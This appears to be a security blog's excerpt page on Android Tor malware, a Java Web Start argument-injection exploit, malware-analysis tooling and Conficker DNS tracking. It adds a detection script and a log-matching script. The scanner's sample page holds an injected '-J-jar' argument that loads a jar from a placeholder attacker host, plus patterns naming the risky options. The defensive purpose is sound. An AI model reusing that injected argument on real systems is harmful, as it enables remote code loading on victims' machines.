Several security firms recently discovered Tor-based malware on the Android platform. When we received a sample, we did some quick analysis of it.
The sample has been reported to have C&C capability using an unusual top-level domain (.onion). .onion names are not resolvable in the public DNS; they are reachable only through the Tor network. The use of the Orbot Tor client on this […]
The recent discovery of the Java Web Start argument injection vulnerability (CVE-2010-0886 and CVE-2010-0887) has opened a new opportunity for attackers to use it in drive-by download attacks. Here is a short write-up on an in-the-wild example, found earlier today, that exploits this vulnerability. The exploit was found on http://buckomre.com/ and […]
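As an added example (not code from the original post, and not the sample hosted on the site named above), the following scanner looks for the argument-injection pattern that the public advisory for CVE-2010-0886/0887 described: a page instantiates the Java Deployment Toolkit and hands it a launch string carrying `-J` options, which the unpatched toolkit passed straight through to javaws (the dangerous ones being `-J-jar` and `-J-XXaltjvm` pointing at an attacker-controlled UNC path). The sample HTML below is constructed; the host `evil.example`, the jar name, and the ActiveX classid are placeholders I supply, not identifiers from the page.

```python
import re

# Constructed sample page (placeholder host and jar name). A legitimate
# docbase/launch argument is a URL or JNLP path, never a javaws option.
SAMPLE_HTML = """
<html><body>
<object classid="clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA" id="dt">
  <param name="launchjnlp" value="1">
  <param name="docbase" value="-J-jar -J\\\\evil.example\\share\\drop.jar none">
</object>
<applet code="Hello.class" width="1" height="1"></applet>
</body></html>
"""

# <param name="..." value="..."> pairs on the Deployment Toolkit object
PARAM_RE = re.compile(r'<param\s+name="(?P<name>[^"]+)"\s+value="(?P<value>[^"]*)"', re.I)
# string argument to a scripted dt.launch("...") / dt.launchjnlp("...") call
LAUNCH_RE = re.compile(r'\.launch(?:jnlp)?\s*\(\s*["\'](?P<arg>[^"\']*)["\']', re.I)
# any -J<option> token: these are JVM options javaws would honour
JOPT_RE = re.compile(r'-J\S*')
# options that load attacker code: a jar, an alternate JVM DLL, or a UNC path
RISKY_RE = re.compile(r'-jar|-XXaltjvm|\\\\', re.I)


def extract_launch_strings(html):
    """Return every string the page could hand to the toolkit's launcher:
    <param> values plus string arguments of launch()/launchjnlp() calls."""
    strings = [m.group("value") for m in PARAM_RE.finditer(html)]
    strings += [m.group("arg") for m in LAUNCH_RE.finditer(html)]
    return strings


def scan_for_arginject(html):
    """Return findings as (launch_string, all -J tokens, risky -J tokens)."""
    findings = []
    for s in extract_launch_strings(html):
        jopts = JOPT_RE.findall(s)
        if not jopts:
            continue
        risky = [o for o in jopts if RISKY_RE.search(o)]
        findings.append((s, jopts, risky))
    return findings


def is_malicious(html):
    """True when a launch string carries at least one risky -J option."""
    return any(risky for _, _, risky in scan_for_arginject(html))


if __name__ == "__main__":
    for s, jopts, risky in scan_for_arginject(SAMPLE_HTML):
        print("launch string:", s)
        print("  -J options :", jopts)
        print("  risky      :", risky)
    print("malicious:", is_malicious(SAMPLE_HTML))
```

Any `-J` token in a docbase or launch argument is already a strong signal, since no legitimate deployment passes JVM options that way; the `RISKY_RE` filter just separates "loads code from the attacker" from noise. Real pages obfuscate the strings in JavaScript, so run this on the DOM after script execution (or on the deobfuscated page), not on the raw HTML alone.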
MyCERT has been developing a few analysis tools for reversing. MySuntikanAPI is still in alpha and needs more improvement. Every hooked API captures detailed information to make sure we don't miss any behaviour, especially in malware samples. The API hooking is done as IAT (Import Address Table) hooking. One of the tools that we created is called […]
Attention! On October 22, 2009, a server upgrade will take place. Due to this the system may be offline for approximately half an hour. The changes will concern security, reliability and performance of the mail service and the system as a whole. For compatibility of your browsers and mail clients with the upgraded server software you should run […]
We have been working to track Conficker's DNS queries in order to identify machines and networks infected with Conficker.C. Tracking 50K DNS names and 500+ queries from each Conficker instance is a bit troublesome when you have to record all DNS queries (200M records/day) and compare them with the 50K/day Conficker.C domain names. :) The main idea of […]
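As an added example (not MyCERT's tracker), the following shows the core of the matching step described above: load the day's Conficker.C domain list into a hash set, stream the resolver's query log through it once, and count matches per client. Membership tests are O(1), so 200M records against 50K names is a single linear pass rather than a 200M x 50K comparison. The domain names and BIND-style query log lines below are constructed placeholders, not real Conficker.C output or MyCERT data.

```python
import re
from collections import defaultdict

# Constructed stand-in for one day's Conficker.C domain list
# (placeholder names; the real list is produced by the worm's DGA).
CONFICKER_DOMAINS_TODAY = {
    "abcdfe.com", "zqxwtp.net", "lkdwpq.org", "vmtrna.info", "pqlzdt.biz",
}

# Constructed resolver query log in BIND query-log style.
QUERY_LOG = """\
29-Mar-2009 10:01:02.123 client 10.1.2.3#5123: query: www.example.com IN A +
29-Mar-2009 10:01:02.456 client 10.1.2.3#5124: query: abcdfe.com IN A +
29-Mar-2009 10:01:03.001 client 10.1.2.3#5125: query: ZQXWTP.NET. IN A +
29-Mar-2009 10:01:03.444 client 10.1.2.3#5126: query: lkdwpq.org IN A +
29-Mar-2009 10:01:05.900 client 10.1.2.7#6001: query: vmtrna.info IN A +
29-Mar-2009 10:01:06.100 client 10.1.2.9#7001: query: mail.example.org IN MX +
"""

QUERY_RE = re.compile(
    r"client (?P<ip>[0-9.]+)#\d+: query: (?P<name>\S+) IN (?P<type>\S+)"
)


def parse_query_log(text):
    """Yield (client_ip, qname) from BIND-style query log lines.
    Names are lower-cased and stripped of the trailing dot so they compare
    equal to the entries in the daily list."""
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group("ip"), m.group("name").lower().rstrip(".")


def find_infected(log_text, daily_domains, min_hits=2):
    """Count per-client queries for names in today's Conficker.C list and
    return {client_ip: hit_count} for clients with at least min_hits.
    A single hit can be a collision with a legitimately registered name
    (the generated names span many TLDs), so a threshold keeps lone
    matches out of the infected list."""
    hits = defaultdict(int)
    for ip, name in parse_query_log(log_text):
        if name in daily_domains:
            hits[ip] += 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    for ip, n in sorted(find_infected(QUERY_LOG, CONFICKER_DOMAINS_TODAY).items()):
        print(f"{ip}\t{n} Conficker.C domain lookups")
```

In production the log would be read as a stream (the file for the day, or a live pipe from the resolver) rather than held in memory, and the domain set would be regenerated each day since the worm's list changes daily; the per-client counting logic stays the same. Raising `min_hits` trades missed low-activity infections for fewer false positives from domains that happen to collide with real sites.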